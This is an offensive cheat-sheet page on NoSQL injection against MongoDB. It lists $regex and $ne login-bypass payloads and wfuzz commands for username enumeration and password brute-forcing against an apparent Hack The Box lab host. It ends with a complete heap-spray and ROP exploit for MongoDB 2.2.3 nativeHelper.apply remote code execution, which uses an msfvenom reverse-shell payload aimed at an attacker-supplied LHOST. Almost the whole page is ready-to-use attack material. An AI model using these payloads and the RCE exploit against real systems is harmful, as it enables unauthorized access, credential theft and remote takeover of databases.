Skip to content

NoSql

nosql injection

sql desc
username=admin&password[$regex]=^a.*&login=login user = admin, pass start with a
username=admin&password[$regex]=^b.*&login=login user = admin, pass start with b
username=admin&password[$regex]=^c.*&login=login user = admin, pass start with c

user enumeration

wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://staging-order.mango.htb

wfuzz -c -z file,/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://staging-order.mango.htb

password bruteforce

wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/alphanum-case-extra.txt --sc 302 -d 'username=admin&password[$regex]=^FUZZ.*&login=login' http://staging-order.mango.htb
remember that is regex and . * & ? \ | will be always returned

MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution

  • https://notes.offsec-journey.com/owasp-top-10-exploitation/untitled
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f js_le > payload.js
    
    |-> If attempting via Web Mongo Injection, try :   ';shellcode=un.....
    |-> Note the  // at the end to comment the rest of the code.
    
    db.my_collection.find({'$where':'shellcode=unescape(">INSERT MSFVENOM GENERATED JS SHELLCODE>"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})//